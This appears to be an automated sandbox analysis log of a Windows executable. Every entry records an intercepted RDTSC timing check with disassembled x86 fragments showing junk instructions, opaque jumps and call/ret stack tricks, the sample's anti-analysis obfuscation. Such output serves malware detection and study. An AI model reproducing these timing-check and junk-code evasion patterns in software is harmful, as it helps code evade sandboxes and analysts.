    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F5B second address: D02F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F23E44F3786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F67 second address: D02F86 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F23E451539Ah 0x00000008 jne 00007F23E4515398h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007F23E451539Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0670D second address: D06721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F23E44F378Eh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0989D second address: D098A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D098A1 second address: D098F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007F23E44F378Ch 0x0000000f jng 00007F23E44F3786h 0x00000015 jno 00007F23E44F3788h 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 jmp 00007F23E44F3794h 0x00000026 pop eax 0x00000027 mov eax, dword ptr [eax] 0x00000029 jmp 00007F23E44F378Fh 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D098F2 second address: D09900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F23E4515396h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A566 second address: D0A570 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A570 second address: D0A577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A601 second address: D0A62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F23E44F3792h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A77B second address: D0A78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F23E4515396h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F23E4515396h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A8C7 second address: D0A8CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A8CD second address: D0A8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A9C2 second address: D0A9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0AB3F second address: D0AB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E45153A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C21B second address: D0C21F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD996 second address: CCD9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F23E4515396h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F971 second address: D0F975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F975 second address: D0F9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F23E4515398h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov si, 9622h 0x00000028 mov edi, dword ptr [ebp+122D386Eh] 0x0000002e push 00000000h 0x00000030 jnp 00007F23E4515398h 0x00000036 mov edi, edx 0x00000038 push 00000000h 0x0000003a mov esi, edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F23E45153A1h 0x00000044 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D119C9 second address: D119CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D119CD second address: D11A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnc 00007F23E45153B6h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F23E4515398h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 jnp 00007F23E451539Ch 0x0000002f mov esi, dword ptr [ebp+122D19EEh] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F23E4515398h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov si, cx 0x00000054 push 00000000h 0x00000056 add dword ptr [ebp+122D2872h], ebx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jnl 00007F23E45153ABh 0x00000065 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D124E5 second address: D124EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D121F0 second address: D121F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D121F4 second address: D121FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12F17 second address: D12F32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F23E451539Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007F23E4515396h 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12F32 second address: D12F77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F23E44F3793h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F23E44F3788h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b stc 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D139CA second address: D139D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1640F second address: D16418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16418 second address: D16435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F23E45153A4h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16435 second address: D1643F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F23E44F3786h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A2F second address: D16A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A35 second address: D16A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A39 second address: D16A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jp 00007F23E4515398h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 nop 0x00000017 mov bx, 652Dh 0x0000001b jmp 00007F23E45153A7h 0x00000020 push 00000000h 0x00000022 mov edi, dword ptr [ebp+122D3846h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D266Dh], ecx 0x00000030 push eax 0x00000031 push esi 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A86 second address: D16A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19096 second address: D190AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jnc 00007F23E4515396h 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D190AA second address: D19100 instructions: 0x00000000 rdtsc 0x00000002 je 00007F23E44F3788h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D2EA7h], eax 0x00000014 push ebx 0x00000015 mov ebx, dword ptr [ebp+122D340Bh] 0x0000001b pop ebx 0x0000001c popad 0x0000001d push 00000000h 0x0000001f mov edi, esi 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F23E44F3788h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov ebx, eax 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F23E44F378Fh 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B0C3 second address: D1B0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B0C7 second address: D1B0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BAB second address: D16BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BAF second address: D16BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F23E44F3791h 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1923F second address: D19243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19243 second address: D1926A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F23E44F37A1h 0x00000011 pushad 0x00000012 jmp 00007F23E44F3793h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C29D second address: D1C2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F21B second address: D1F21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D434 second address: D1D438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C2A1 second address: D1C2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F23E44F378Eh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C2B7 second address: D1C2BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D202BC second address: D202C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F4A9 second address: D1F4AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D21420 second address: D21442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F23E44F3798h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D21442 second address: D21448 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23266 second address: D232F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F23E44F378Ah 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F23E44F3788h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call 00007F23E44F3799h 0x0000002e mov edi, edx 0x00000030 pop ebx 0x00000031 xor edi, 0FADA8AAh 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F23E44F3788h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov ebx, dword ptr [ebp+122D2B0Fh] 0x00000059 push 00000000h 0x0000005b sbb edi, 68F6CD0Eh 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 push esi 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232F6 second address: D23313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F23E451539Ch 0x0000000b jnp 00007F23E4515396h 0x00000011 popad 0x00000012 push eax 0x00000013 jnl 00007F23E45153AFh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24152 second address: D2416D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2416D second address: D24171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24171 second address: D241D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F23E44F3788h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 pushad 0x00000025 mov si, 6D5Fh 0x00000029 sub dword ptr [ebp+12450949h], eax 0x0000002f popad 0x00000030 mov bl, BCh 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2865h], edx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F23E44F3788h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 or dword ptr [ebp+122D3023h], ebx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D241D8 second address: D241E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25117 second address: D25128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25128 second address: D2512F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2512F second address: D2519F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F23E44F3788h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 movzx edi, cx 0x00000027 or bx, C747h 0x0000002c push 00000000h 0x0000002e call 00007F23E44F378Bh 0x00000033 call 00007F23E44F378Eh 0x00000038 mov ebx, eax 0x0000003a pop edi 0x0000003b pop ebx 0x0000003c push 00000000h 0x0000003e mov ebx, 16987B74h 0x00000043 xor bh, FFFFFFBBh 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a jo 00007F23E44F3786h 0x00000050 pop esi 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2519F second address: D251A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D270BF second address: D270CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D270CC second address: D270D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D270D0 second address: D270D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F601 second address: D2F607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F607 second address: D2F60D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F60D second address: D2F612 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F0B0 second address: D2F0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F0B4 second address: D2F0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F0B8 second address: D2F0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F0BE second address: D2F0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edi 0x00000008 jmp 00007F23E451539Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3364C second address: D33656 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33656 second address: D3366D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D35B0C second address: D35B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39BDE second address: D39BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39BE6 second address: D39BFA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F23E44F3786h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39BFA second address: D39C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E45153A9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A668 second address: D3A681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3795h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A799 second address: D3A7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A7A0 second address: D3A7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A7A6 second address: D3A7C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F23E45153A3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A915 second address: D3A919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EDA6 second address: D3EDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EDAA second address: D3EDBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F23E44F3786h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EDBA second address: D3EDD9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F23E45153A3h 0x00000011 rdtsc
